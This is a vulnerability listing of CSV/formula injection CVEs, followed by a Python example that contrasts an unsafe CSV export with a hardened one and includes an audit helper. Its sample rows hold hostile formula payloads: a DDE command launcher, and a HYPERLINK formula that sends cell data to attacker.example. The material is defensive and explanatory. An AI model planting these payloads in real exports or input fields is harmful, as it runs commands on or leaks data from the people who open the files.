Total: 280 CVEs
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 | Description |
|---|---|---|---|---|---|---|
| CVE-2022-1194 | 1 Mobileeventsmanager | 1 Mobile Events Manager | 2024-11-21 | N/A | 8.8 HIGH | The Mobile Events Manager WordPress plugin before 1.4.8 does not properly escape the Enquiry source field when exporting events, or the Paid for field when exporting transactions as CSV, leading to a CSV injection vulnerability. |
| CVE-2022-0142 | 1 Vfbpro | 1 Visual Form Builder | 2024-11-21 | 7.5 HIGH | 9.8 CRITICAL | The Visual Form Builder WordPress plugin before 3.0.8 is vulnerable to CSV injection, allowing a user with low-level or no privileges to inject a command that will be included in the exported CSV file, leading to possible code execution. |
| CVE-2021-46363 | 1 Magnolia-cms | 1 Magnolia Cms | 2024-11-21 | 9.3 HIGH | 7.8 HIGH | An issue in the Export function of Magnolia v6.2.3 and below allows attackers to perform formula injection attacks via crafted CSV/XLS files. These formulas may result in arbitrary code execution on a victim's computer when the exported files are opened with Microsoft Excel. |
| CVE-2021-43515 | 1 Kimai | 1 Kimai | 2024-11-21 | 6.8 MEDIUM | 7.8 HIGH | CSV injection (aka Excel Macro Injection or Formula Injection) exists when creating a new timesheet in Kimai. By filling the Description field with a malicious payload, the payload is mishandled when exported to a CSV file. |
| CVE-2021-43257 | 1 Mantisbt | 1 Mantisbt | 2024-11-21 | 6.0 MEDIUM | 7.8 HIGH | Lack of neutralization of formula elements in the CSV API of MantisBT before 2.25.3 allows an unprivileged attacker to execute code or gain access to information when a user opens the csv_export.php generated CSV file in Excel. |
| CVE-2021-41824 | 1 Craftcms | 1 Craft Cms | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH | Craft CMS before 3.7.14 allows CSV injection. |
| CVE-2021-41270 | 2 Fedoraproject, Sensiolabs | 2 Fedora, Symfony | 2024-11-21 | 4.0 MEDIUM | 6.5 MEDIUM | Symfony/Serializer handles serializing and deserializing data structures for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Symfony versions 4.1.0 before 4.4.35 and versions 5.0.0 before 5.3.12 are vulnerable to CSV injection, also known as formula injection. In Symfony 4.1, maintainers added the opt-in `csv_escape_formulas` option in the `CsvEncoder`, to prefix all cells starting with `=`, `+`, `-` or `@` with a tab `\t`. Since then, OWASP added ... |
| CVE-2021-40848 | 1 Mahara | 1 Mahara | 2024-11-21 | 6.8 MEDIUM | 7.8 HIGH | In Mahara before 20.04.5, 20.10.3, 21.04.2, and 21.10.0, exported CSV files could contain characters that a spreadsheet program could interpret as a command, leading to execution of a malicious string locally on a device, aka CSV injection. |
| CVE-2021-3188 | 1 Phplist | 1 Phplist | 2024-11-21 | 10.0 HIGH | 9.8 CRITICAL | phpList 3.6.0 allows CSV injection, related to the email parameter, and /lists/admin/ exports. |
| CVE-2021-39022 | 1 Ibm | 1 Guardium Data Encryption | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH | IBM Guardium Data Encryption (GDE) 4.0.0.0 and 5.0.0.0 saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by spreadsheet software. IBM X-Force ID: 213858. |
| CVE-2021-38424 | 1 Deltaww | 1 Dialink | 2024-11-21 | 6.8 MEDIUM | 5.9 MEDIUM | The tag interface of Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to an attacker injecting formulas into the tag data. Those formulas may then be executed when the export is opened with a spreadsheet application. |
| CVE-2021-37702 | 1 Pimcore | 1 Pimcore | 2024-11-21 | 6.5 MEDIUM | 8.0 HIGH | Pimcore is an open source data & experience management platform. Prior to version 10.1.1, Data Object CSV import allows formula injection. The problem is patched in 10.1.1. Aside from upgrading, one may apply the patch manually as a workaround. |
| CVE-2021-37131 | 1 Huawei | 3 Imanager Neteco, Imanager Neteco 6000, Manageone | 2024-11-21 | 6.0 MEDIUM | 6.8 MEDIUM | There is a CSV injection vulnerability in ManageOne, iManager NetEco and iManager NetEco 6000. An attacker with high privilege may exploit this vulnerability through some operations to inject into the CSV files. Due to insufficient input validation of some parameters, the attacker can exploit this vulnerability to inject into CSV files on the target device. |
| CVE-2021-36334 | 1 Dell | 1 Emc Cloud Link | 2024-11-21 | 6.0 MEDIUM | 5.9 MEDIUM | Dell EMC CloudLink 7.1 and all prior versions contain a CSV formula injection vulnerability. A remote, high-privileged attacker may potentially exploit this vulnerability, leading to arbitrary code execution on the end user's machine. |
| CVE-2021-33256 | 1 Zohocorp | 1 Manageengine Adselfservice Plus | 2024-11-21 | 9.3 HIGH | 8.8 HIGH | A CSV injection vulnerability on the login panel of ManageEngine ADSelfService Plus Version: 6.1 Build No: 6101 can be exploited by an unauthenticated user. The j_username parameter seems to be vulnerable, and a reverse shell could be obtained if a privileged user exports the "User Attempts Audit Report" as a CSV file. Note: The vendor disputes this vulnerability, claiming "This is not a valid vulnerability in our ADSSP product. We don't see this as a security issue at our side." |
| CVE-2021-29667 | 2 Ibm, Linux | 2 Spectrum Scale, Linux Kernel | 2024-11-21 | 6.8 MEDIUM | 7.8 HIGH | IBM Spectrum Scale 5.0.0 through 5.0.5.6 and 5.1.0 through 5.1.0.2 is potentially vulnerable to CSV injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of CSV file contents. IBM X-Force ID: 199403. |
| CVE-2021-27839 | 1 Bigprof | 1 Online Invoicing System | 2024-11-21 | 5.8 MEDIUM | 4.4 MEDIUM | A CSV injection vulnerability found in Online Invoicing System (OIS) 4.3 and below can be exploited by users to perform malicious actions such as redirecting admins to unknown or harmful websites, or disclosing other clients' details that the user did not have access to. |
| CVE-2021-27020 | 1 Puppet | 1 Puppet Enterprise | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH | Puppet Enterprise presented a security risk by not sanitizing user input when doing a CSV export. |
| CVE-2021-25962 | 1 Shuup | 1 Shuup | 2024-11-21 | 6.8 MEDIUM | 8.0 HIGH | The Shuup application in versions 0.4.2 to 2.10.8 is affected by a formula injection vulnerability. A customer can inject payloads in the name input field of the billing address while buying a product. When a store administrator accesses the reports page to export the data as an Excel file and opens it, the payload gets executed. |
| CVE-2021-25960 | 1 Salesagility | 1 Suitecrm | 2024-11-21 | 6.0 MEDIUM | 8.0 HIGH | In the SuiteCRM application, v7.11.18 through v7.11.19 and v7.10.29 through v7.10.31 are affected by a CSV injection (formula injection) vulnerability. A low-privileged attacker can use the accounts module to inject payloads in the input fields. When an administrator accesses the accounts module to export the data as a CSV file and opens it, the payload gets executed. This was not fixed properly as part of CVE-2020-15301, allowing the attacker to bypass the security measure. |
| CVE-2021-24441 | 1 Fetchdesigns | 1 Sign-up Sheets | 2024-11-21 | 6.0 MEDIUM | 8.0 HIGH | The Sign-up Sheets WordPress plugin before 1.0.14 does not sanitise or validate the Sheet title when generating the CSV to export, which could lead to a CSV injection issue. |
| CVE-2021-24144 | 1 Ciphercoin | 1 Contact Form 7 Database Addon | 2024-11-21 | 6.8 MEDIUM | 7.8 HIGH | Unvalidated input in the Contact Form 7 Database Addon plugin, versions before 1.2.5.6, was prone to a vulnerability that lets remote attackers inject arbitrary formulas into CSV files. |
| CVE-2021-24016 | 1 Fortinet | 1 Fortimanager | 2024-11-21 | 9.3 HIGH | 3.7 LOW | An improper neutralization of formula elements in a CSV file in Fortinet FortiManager version 6.4.3 and below, 6.2.7 and below allows an attacker to execute arbitrary commands via a crafted IPv4 field in a policy name, when exported as an Excel file and opened unsafely on the victim host. |
| CVE-2021-23654 | 1 Html-to-csv Project | 1 Html-to-csv | 2024-11-21 | 7.5 HIGH | 5.6 MEDIUM | This affects all versions of package html-to-csv. When there is a formula embedded in an HTML page, it gets accepted without any validation and is passed through unchanged when converting the page into a CSV file. Through this, a malicious actor can embed or generate a malicious link or execute commands via CSV files. |
| CVE-2021-23286 | 1 Eaton | 1 Intelligent Power Manager | 2024-11-21 | 7.9 HIGH | 5.7 MEDIUM | Eaton Intelligent Power Manager Infrastructure (IPM Infrastructure) version 1.5.0plus205 and all prior versions are vulnerable to CSV formula injection. |
| CVE-2021-22771 | 1 Schneider-electric | 2 Easergy T300, Easergy T300 Firmware | 2024-11-21 | 6.0 MEDIUM | 7.3 HIGH | A CWE-1236: Improper Neutralization of Formula Elements in a CSV File vulnerability exists in Easergy T300 with firmware V2.7.1 and older that would allow arbitrary command execution. |
| CVE-2021-22153 | 1 Blackberry | 1 Unified Endpoint Management | 2024-11-21 | 6.0 MEDIUM | 7.3 HIGH | A remote code execution vulnerability in the Management Console component of BlackBerry UEM version(s) 12.13.1 QF2 and earlier and 12.12.1a QF6 and earlier could allow an attacker to potentially cause the spreadsheet application to run commands on the victim's local machine with the authority of the user. |
| CVE-2021-21302 | 1 Prestashop | 1 Prestashop | 2024-11-21 | 6.5 MEDIUM | 6.8 MEDIUM | PrestaShop is a fully scalable open source e-commerce solution. In PrestaShop before version 1.7.7.2 there is a CSV injection vulnerability possible by using shop search keywords via the admin panel. The problem is fixed in 1.7.7.2. |
| CVE-2021-1475 | 1 Cisco | 1 Umbrella | 2024-11-21 | 3.5 LOW | 6.5 MEDIUM | Multiple vulnerabilities in the Admin audit log export feature and Scheduled Reports feature of Cisco Umbrella could allow an authenticated, remote attacker to perform formula and link injection attacks on an affected device. For more information about these vulnerabilities, see the Details section of the Cisco advisory. |
| CVE-2021-1474 | 1 Cisco | 1 Umbrella | 2024-11-21 | 6.8 MEDIUM | 6.5 MEDIUM | Multiple vulnerabilities in the Admin audit log export feature and Scheduled Reports feature of Cisco Umbrella could allow an authenticated, remote attacker to perform formula and link injection attacks on an affected device. For more information about these vulnerabilities, see the Details section of the Cisco advisory. |
| CVE-2020-9466 | 1 Export Users To Csv Project | 1 Export Users To Csv | 2024-11-21 | 5.8 MEDIUM | 6.1 MEDIUM | The Export Users to CSV plugin through 1.4.2 for WordPress allows CSV injection. |
| CVE-2020-9372 | 1 Codepeople | 1 Appointment Booking Calendar | 2024-11-21 | 6.8 MEDIUM | 7.8 HIGH | The Appointment Booking Calendar plugin before 1.3.35 for WordPress allows user input (in fields such as Description or Name) in any booking form to be any formula, which then could be exported via the Bookings list tab in /wp-admin/admin.php?page=cpabc_appointments.php. The attacker could achieve remote code execution via CSV injection. |
| CVE-2020-9347 | 1 Zohocorp | 1 Manageengine Password Manager Pro | 2024-11-21 | 7.5 HIGH | 9.8 CRITICAL | Zoho ManageEngine Password Manager Pro through 10.x has a CSV Excel Macro Injection vulnerability via a crafted name that is mishandled by the Export Passwords feature. NOTE: the vendor disputes the significance of this report because they expect CSV risk mitigation to be provided by an external application, and do not plan to add CSV constraints to their own products. |
| CVE-2020-9205 | 1 Huawei | 1 Manageone | 2024-11-21 | 4.0 MEDIUM | 4.9 MEDIUM | There is a CSV injection vulnerability in ManageOne 8.0.1. An attacker with common privilege may exploit this vulnerability through some operations to inject into the CSV files. Due to insufficient input validation of some parameters, the attacker can exploit this vulnerability to inject into CSV files on the target device. |
| CVE-2020-9200 | 1 Huawei | 1 Imanager Neteco 6000 | 2024-11-21 | 7.2 HIGH | 7.8 HIGH | There is a CSV injection vulnerability in iManager NetEco 6000 version V600R021C00. An attacker with common privilege may exploit this vulnerability through some operations to inject into the CSV files. Due to insufficient input validation of some parameters, the attacker can exploit this vulnerability to inject into CSV files on the target device. |
| CVE-2020-9017 | 1 Litecart | 1 Litecart | 2024-11-21 | 6.0 MEDIUM | 8.0 HIGH | LiteCart through 2.2.1 allows CSV injection via a customer's profile. |
| CVE-2020-7947 | 1 Auth0 | 1 Login By Auth0 | 2024-11-21 | 7.5 HIGH | 9.8 CRITICAL | An issue was discovered in the Login by Auth0 plugin before 4.0.0 for WordPress. It has numerous fields that can contain data that is pulled from different sources. One issue with this is that the data isn't sanitized, and no input validation is performed, before the exporting of the user data. This can lead to (at least) CSV injection if a crafted Excel document is uploaded. |
| CVE-2020-7049 | 1 Nozominetworks | 1 Guardian | 2024-11-21 | 8.5 HIGH | 7.3 HIGH | Nozomi Networks OS before 19.0.4 allows CSV injection via /#/network?tab=network_node_list.html. |
| CVE-2020-4759 | 1 Ibm | 1 Filenet Content Manager | 2024-11-21 | 9.3 HIGH | 7.8 HIGH | IBM FileNet Content Manager 5.5.4 and 5.5.5 is potentially vulnerable to CSV injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of CSV file contents. IBM X-Force ID: 188736. |
| CVE-2020-4689 | 1 Ibm | 1 Security Guardium | 2024-11-21 | 8.5 HIGH | 6.8 MEDIUM | IBM Security Guardium 11.2 is vulnerable to CSV injection. A remote privileged attacker could execute arbitrary commands on the system, caused by improper validation of CSV file contents. IBM X-Force ID: 186696. |
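Every entry above is the same defect (CWE-1236): user-controlled text is written into a CSV export, and a spreadsheet later treats a cell beginning with `=`, `+`, `-` or `@` as a formula. The Symfony entry (CVE-2021-41270) records the two halves of the fix: know which leading characters are triggers, and neutralize them before the cell is written. OWASP's current guidance also counts tab (0x09) and carriage return (0x0D) as triggers and recommends prefixing such cells with a single quote rather than a tab. The following is an added Python example, not code from any of the listed projects; the function names, the `SAMPLE_ROWS` export and the payloads in it are constructed for illustration. It shows the unsafe export pattern next to a hardened one, and an audit helper for finding risky cells in a CSV an application has already produced.

```python
"""CSV / formula injection (CWE-1236): unsafe export, hardened export, audit.

Added example; not taken from any project in the CVE list above.
Sample rows and payloads below are constructed for illustration.
"""
import csv
import io

# Leading characters a spreadsheet treats as the start of a formula or field
# code. '=', '+', '-', '@' are the classic set (the ones Symfony's original
# csv_escape_formulas option covered); tab and carriage return are the two
# OWASP later added to its CSV injection guidance.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def _is_plain_number(s: str) -> bool:
    """'-5' or '+3.5' is a number to a spreadsheet, not a formula."""
    try:
        float(s)
    except ValueError:
        return False
    return True


def is_formula_like(value) -> bool:
    """True if a string cell would be interpreted as a formula when opened."""
    if not isinstance(value, str) or not value.startswith(FORMULA_TRIGGERS):
        return False
    return not _is_plain_number(value)


def neutralize_cell(value):
    """Return a cell value that a spreadsheet will render as literal text.

    Non-string values pass through untouched (a negative int is data, and
    prefixing it would silently turn it into text). Risky strings get a
    leading apostrophe, which Excel, LibreOffice and Google Sheets all treat
    as "the rest of this cell is text". The writer in export_csv_safe adds the
    surrounding double quotes and doubles any embedded quotes.
    """
    if is_formula_like(value):
        return "'" + value
    return value


def export_csv_unsafe(rows) -> str:
    """The pattern behind most entries above: user data written straight out."""
    buf = io.StringIO()
    csv.writer(buf, lineterminator="\n").writerows(rows)
    return buf.getvalue()


def export_csv_safe(rows) -> str:
    """Hardened export: every cell neutralized, every cell quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(c) for c in row])
    return buf.getvalue()


def find_formula_cells(csv_text: str):
    """Audit an existing export: list (row, column, value) of risky cells.

    When triaging a report like those above, run this over the CSV the
    application actually produced rather than guessing from its source.
    """
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                hits.append((r, c, cell))
    return hits


# Constructed sample: a "export users" report where the attacker controls the
# name field (the shape of the Shuup, SuiteCRM and LiteCart entries above).
SAMPLE_ROWS = [
    ["id", "name", "email"],
    [1, "Alice Example", "alice@example.test"],
    # DDE-style payload: on Excel builds that still allow DDE after a prompt, launches calc
    [2, "=cmd|' /C calc'!A0", "mallory@example.test"],
    # Exfiltration / phishing: builds a URL from another cell and invites a click
    [3, '=HYPERLINK("https://attacker.example/?x="&C2,"Verify account")', "eve@example.test"],
    # The less obvious triggers
    [4, "@SUM(1+1)", "a@example.test"],
    [5, "+1+1", "b@example.test"],
    [6, "\t=1+1", "c@example.test"],
    [7, -5, "d@example.test"],  # a genuine negative number, must survive unchanged
]

if __name__ == "__main__":
    print("risky cells in unsafe export:", find_formula_cells(export_csv_unsafe(SAMPLE_ROWS)))
    safe = export_csv_safe(SAMPLE_ROWS)
    print("risky cells in safe export:", find_formula_cells(safe))
    print(safe)
```

Two caveats worth keeping in mind when applying this to a real export. The apostrophe is part of the cell's data once written, so a CSV that is consumed by another program rather than a spreadsheet will see `'=cmd...` where it used to see `=cmd...`; if the same export feeds both humans and machines, neutralize only on the spreadsheet-bound path, or use the spreadsheet's native format with cells typed as strings. And Excel's Protected View and DDE prompts are defence in depth on the victim's side only; several disputed entries above (ManageEngine) lean on them, but the server that writes the file is the one place the fix is reliable.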